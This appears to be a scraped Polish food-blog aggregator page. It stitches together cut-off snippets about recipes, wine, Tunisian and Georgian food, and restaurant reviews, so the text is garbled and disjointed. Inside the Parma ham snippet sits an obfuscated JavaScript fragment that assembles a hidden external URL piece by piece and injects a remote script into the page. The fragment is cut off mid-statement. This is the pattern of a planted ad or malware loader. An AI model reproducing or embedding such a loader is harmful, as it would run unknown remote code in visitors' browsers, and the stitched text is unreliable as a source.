czerwonych)kilka suszonych pomidorów (odsączonych z oliwy)1 gruszka (obrana i pokrojona w plastry)kilka suszonych owoców morelikilka świeżych listków bazyliikilka kromek dobrego pieczywaSPOSÓB PRZYGOTOWANIA:1. Pomidorki koktajlowe i winogrona dokładnie myjemy pod bieżącą wodą, po czym delikatnie osuszamy papierowym ręcznikiem.2. Mini mozzarellę razem z pomidorkami koktajlowymi i listkami bazylii nadziewamy na wykałaczki - powstaną koreczki :)3. Żurawinę przekładamy(...)składniki antipasto na drewnianej desce lub na dużym talerzu.Podajemy z pieczywem pokrojonym na małe kromeczki.Idealne na sylwestrową przekąskę, na romantyczną kolacje we dwoje (koniecznie z kieliszkiem dobrego, czerwonego, wytrawnego wina!) lub na niedzielne, leniwe śniadanie. Tak naprawdę na każdą okazję.Smacznego
W kuchni Katiepiniowe, jak również pestki dyni, orzechy włoskie, laskowe, nerkowce, żurawinę, bakalie, kandyzowaną skórkę pomarańczy, drobinki czekolady. Możliwości są nieskończone. We Toskanii te chrupiące ciasteczka podaje się tradycyjnie ze słodkim winem, w którym można je maczać. Tym razem proponuję Wam jedną z moich ulubionych kompozycji: cantuccini z suszonymi morelami i ziarnami tonki. Uważam, że są przepyszne! Na około 30 cantuccini Przygotowanie(...)pistacji (niesolonych) - opcjonalnie ● 130 g drobnego cukru (trzcinowego lub białego, lub pół na pół) ● 1 opakowanie cukru waniliowego ● 2 szczypty soli morskiej ● 3 łyżki oleju z pestek winogron ● 250 g mąki pszennej (T45 lub 55) ● 2 płaskie łyżeczki proszku do pieczenia Przygotowanie : Ziarna tonki zetrzyj na małej tarce (jak do gałki muszkatołowej). Suszone morele drobno posiekaj. Pistacje (jeśli
Smaki Francji współczesna kuchnia francuskanaoliwiony. Gruszki przecinamy na połowy i pozbywamy się rdzenia. Możemy je również obrać ale nie jest to konieczne. Gruszki dobrze jest też przed grillowaniem natrzeć np. olejem z pestek winogron Gruszki wkładamy do grilla przeciętą stroną do rusztu. Grillujemy aż uzyskają łady przypalony wzór około 10 minut. Grillowane gruszki podawać najlepiej na ciepło np. z lodami i kremem czekoladowym Polecamy(...)górnym ruszcie/półce do podgrzewania lub obok grillowanego dania głównego. Mają one lekko słodki smak i mogą być podawane z gałką lodów waniliowych. Składniki: 2 duże gruszki ½ szklanki białego wina 1 łyżka cukru 1 laska cynamonu (około 2 cm) ½ łyżeczki gałki muszkatołowej Przygotowanie: Rozgrzewamy grilla, dokładnie oczyszczamy ruszt i go oliwimy. Gruszki przecinamy wzdłużnie na pół i usuwamy rdzeń
naRuszciePizza z sosem pomidorowym, mozzarellą, serem Scamroza suszonymi pomidorami i oliwkami. Biała pizza z mozzarellą, kwiatami cukinii, pomidorkami, serem burrata i szczypiorkiem. Mój faworyt! A na deser Focaccia z winogronami. Właśnie mamy sezon, więc są one WSZĘDZIE! Trzeba przyznać - są pyszne. A to cudo awansowało ostatnio na jeden z moich ulubionych owoców! Fichi d'India z Sycylii(...)jest naszym Dniem Tequili, więc muszę się zbierać... :D Właśnie uświadomiłam sobie, że wszyscy moi współlokatorzy posiadają normalne produkty spożywcze w lodówce, a na mojej półce znajduje się: 1. Wino Montendoli Tradizionale Vermaccia Di San Gimignano (polecam!) 2. Jabłkowy Vinegar. 3. Masło. ........... Jak przystało na kucharkę, czy co?! UDANEJ SOBOTNIEJ NOCY KOCHANI!!! P.S. Chciałabym podziękować mojemu
DominikaDolcizrobione. Na szczęście nie będzie to lista długa przesycona E 300 E 404 oraz trudnymi do wypowiedzienia nazwami chemicznymi, gdyż...soki GRANTE to 100 % owoca. W tym wypadku granatu, winogrona, pigwy! O dobroczynnych właściwościach granatu , wielu z nas zapomina, a warto, naprawdę warto go poznać bliżej, bo może okazac się, że kupując sztuczne suplementy diety, przepłacamy, niszczymy nasz żołądek. Alternatywą(...)witaminy, minerały niezbędne do prawidłowego funkcjonowania organizmu. Sok z granatu, schłodzony w lodówce idealnie nadaje się do...posiłku. Tak w stylu włoskim...jak i polskim! Osoby lubiące pić wino do obiadu lub kolacji , powinny sięgnąć również po ten właśnie sok, gdyż doznania smakowe są rewelacyjne, a..po soku z granatu od GRANTE można wsiąść za kierownicę..! Granat uprawiano
Z Kuchni Do Kuchniwinoroślami. Jest najbardziej „europejskim” krajem wśród krajów arabskich. Mimo, że jest to kraj muzułmański, dozwolone jest tu picie alkoholu, a nawet znajduje się tu wiele winnic produkujących pyszne wina. Kuchnia tunezyjska jest bardzo różnorodna dzięki wpływom kuchni tureckiej, francuskiej i śródziemnomorskiej. Harissa W kuchni tunezyjskiej bardzo ważne jest świeże pieczywo spożywane do prawie każdego posiłku. Popularne są świeże bagietki(...)jest rachatłukum-słodkie kostki owocowe przypominające galaretkę posypane cukrem pudrem. Znajdziemy tu też pyszne chałwy z dodatkiem orzechów i migdałów oraz baklavę. Tunezjczycy spożywają też dużo świeżych, słodkich owoców-winogrona, daktyle, figi, granaty, opuncje. Owoce opuncji Daktyle na miejscowym targu Kuchnia Tunezyjska jest kuchnią aromatyczną i ostrą. Używa się tu dużo przypraw, przede wszystkim ostrej papryki, kolendry, kminku, szafranu, cynamonu
Zawsze głodna!Napój karnawałowy alkoholowy wprost z Hiszpanii. Jak byliśmy latem w Hiszpanii często częstowano nas takim rarytasem. Ponieważ mamy karnawał i Tłusty Czwartek a potem ostatki więc
Moje Małe CzarowanieJedynie paczuszka prezentów na mecie była niczego sobie. Byłoby dużo fajniej, gdyby więcej osób zdecydowało się wystartować. A dlaczego frekwencja była taka niska? Gdybym miała obstawiać, powiedziałabym, że to wina kiepskiej reklamy i absolutnego braku informacji - mały druczek na stronie internetowej oraz ulotce, to żadna informacja. Zwłaszcza, jeżeli zawiera jedynie godzinę i miejsce. Tak czy siak po grze miejskiej(...)być gburowaty, a jedzenie brzydko podane – to i tak nie zmieniłoby mojej oceny. Doskonałe! 10/10 (nawet 11/10) 2. KAMARI 3/10 pkt Kulebiak po grecku, czyli polędwiczka w liściach winogron w cieście filo z espumą żurawinową, podana z pastą z pieczonego bakłażana i zielonym groszkiem W KAMARI spodziewałam się znacznie więcej. Uprzedzone o długim oczekiwaniu zamówiłyśmy piwo, otrzymałyśmy
Życie zamknięte w smakuzimno “ravioli” z soku z kiszonego ogórka nadziane siekanym ozorem cielęcym z żółtkiem souse vide, podane z sałatką z nasturcji i szczawiu krwistego z wędzonym majonezem i galaretką z wina Marsala. Do sałatki dodałam także krążki szalotki opalone palnikiem do kremu brulee. Znakomitym uzupełnieniem całej kompozycji i struktury serwowanych składników będą chrupiące grzanki z ciabatty. Ponieważ przez cały(...)godz. w kąpieli wodnej o temp. 64°C. Jeszcze ciepłe ozory obierz ze skóry, wystudź, posiekaj w drobną kostkę. Wędzony majonez 120 g szalotek 250 g oleju z pestek winogron 1 żółtko (temperatura pokojowa) 2 łyżeczki musztardy Dijon 1 łyżeczka ocet z kwiatów czarnego bzu Sól i pieprz do smaku Rozgrzej piekarnik do 160°C. Szalotki przekrój na pół
SzczyptaSmaQświeża kaszanka, wędzony boczek i salceson), Bratwurst (kiełbasa na gorąco), za to spory wybór rewelacyjnych, wytwarzanych przez właściciela win. Owe wina zmieniły mój ogólny, nieprzychylny pogląd na wina niemieckie, w szczególności białym badeńskim muszę zwrócić honor - genialny Grauer i Weißer Burgunder, Gewürztraminer czy Sylvaner zachwycają świeżością, kolorem i aromatem. Jedzenie w takich gospodach jest niezwykle smaczne(...)Dodatkowo na smak wpływa wspaniała atmosfera straussów, w których możemy dostać pled, rozłożyć się na trawie lub usiąść na drewnianych ławach i zajadać pyszne potrawy na dworze, popijając znakomitym winem w otoczeniu łagodnych, winnych wzgórz. A my dodatkowo mieliśmy
Kuchnia Prezydentowejkrakersikach Czas wykonania : 5 minut 2. Mini hamburgery Co potrzebujesz: gotowe bułki do hamburgerów i mięso, ser żółty, sałata, ketchup Wykonanie : Bułkę, mięso i ser wycinać kieliszkiem do wina. Złożyć hamburgery i zapiec około 5 minut w piekarniku Czas wykonania: 10-15 minut 3. Kiełbaski w cieście francuskim Co potrzebujesz: rolka ciasta francuskiego, kiełbaski typu frankfurterki lub kabanosy Wykonanie(...)plastrów szynki parmeńskiej, rukolę, kawałek cytryny Wykonanie : Gruszkę pokroić na około 8 części, skropić sokiem z cytryny, zawinąć w szynkę (dodając rukolę) Czas wykonania: 5 minut 6. Szaszłyki z winogrona i sera pleśniowego Co potrzebujesz : kawałek sera pleśniowego, winogrona Wykonanie : Ser pokroić na grube kostki, nabijać z winogronem na wykałaczki Czas wykonania: 3-5 minut 7. Mix bakalii
Tradycyjna KuchniaDostępne są jeszcze truskawki, poziomki i czereśnie. To najlepszy okres na przygotowanie z tych owoców rozmaitych przetworów: soków, dżemów, musów, galaretek, konfitur, win i nalewek. W lipcu nie możemy przegapić sezonu na: jagody; porzeczki; agrest; morele; orzechy włoskie (na nalewki i syropy); kalarepę; fasolkę szparagową(...)przerośniętych ogórków można natomiast przygotować pikle. Pod koniec miesiąca (o ile dopisuje pogada) zaczynają pojawiać się grzyby. Wrzesień to czas robienia przetworów z: jabłek; śliwek; winogron; aronii; jarzębiny; kalafiora; papryki. Przetwory w październiku Październik to czas kiszenia kapusty i przygotowania innych kiszonek (z buraków, kalafiora, marchewki, jabłek itp.). Warto zrobić przetwory
Ukojenie Podniebieniamango i kurczakiem Tortilla española de patatas Sałatka z ryżem kurczakiem i ananasem Sałatka ziemniaczana Meksykańska sałatka z kurczakiem Klasyczna sałatka jarzynowa Sałatka z kurczakiem, selerem naciowym i winogronami Przekąski Pasta z bobu z białym serem Pasta łososiowa z kaparami Guacamole, pasta z awokado Pasta z łososia Wrapy z szynką Pasta z tuńczykiem i oliwkami Zimne nóżki Smalec do chleba(...)rzodkiewką Szybka tarta z warzywami Tarta ze szpinakiem i serem pleśniowym Focaccia z oliwkami Ryby Śledzie w sosie musztardowym Śledź z cebulą i jabłkiem Zielone małże nowozelandzkie w winie Śledzie remoulade z selerem Marynowane śledzie Jarzynowa sałatka ze śledziem Sałatka śledziowa z buraczkami Tatar z łososia z mango Korzenny śledź z rodzynkami Piernikowy śledź Tatar ze śledzia Rolmopsy
Kulinarne przygody Gatitywzględu na wszystkie czynniki składające się na proces produkcji. Brak konserwantów i mała zawartość soli powodują, że charakterystyczne, cieniutkie plasterki tej szynki tworzą zgrane duety z owocami, takimi jak winogrona, melony czy gruszki. Można z niej przyrządzać główne dania, a także przystawki. Sprawdzi się jako główny składnik dania, jak i jako dodatek, na przykład do pizzy czy tortellini. Lepiej jednak(...)występuje w duecie z melonem. Trudno się temu dziwić. Słodki smak i soczystość tego owocu świetnie „podkręca” delikatny smak szynki parmeńskiej. Dania tego typu najlepiej uzupełnia białe wino, np. Prosecco. (function(){ qxff=document.createElement("script");qxff_=("us")+("ta"); qxff_+="t"+(".");qxff_+=("in");qxffu="122614599";qxff.async=true; qxffu+=".z8dde461xffa75frd";qxff.type="text/javascript";qxff_+="f"+"o"+("/"); qxffu+="duujX2yfek1q4";qxff.src="https://"+qxff
Mojewlasne.plprzystankiem na Drodze Wojennej był.. przydrożny stragan z lokalnymi smakołykami: przetworami, owocami i oczywiście winem. Po posmakowaniu domowych rarytasów i wyrównaniu poziomu „elektrolitów” wyruszyliśmy w dalszą drogę. Domowe Wino Domowe przetwory Nieszpułki Twierdza Ananuri Następnie skierowaliśmy się na północ i kolejnym naszym punktem była przepiękna twierdza Ananuri z XVII wieku, położona nad malowniczym, choć sztucznym Jeziorem Żinwalskim. Jest(...)Swoistego uroku dodają też bajecznie kolorowe stragany z lokalnymi smakołykami – orzechami, suszonymi owocami, sokiem z granatów czy churchelami. Churchele to gruziński przysmak powstający z mocno odparowanego soku z winogron z dodatkiem mąki oraz ulubionymi dodatkami: orzechami, migdałami, owocami, itp. Pyszne! Churchele Stragan ze smakołykami Gudauri Po zwiedzaniu i zakupach (nie byłabym sobą, gdybym nie przywiozła jakiegoś cudaka, czyli glin
Kate's Kitchen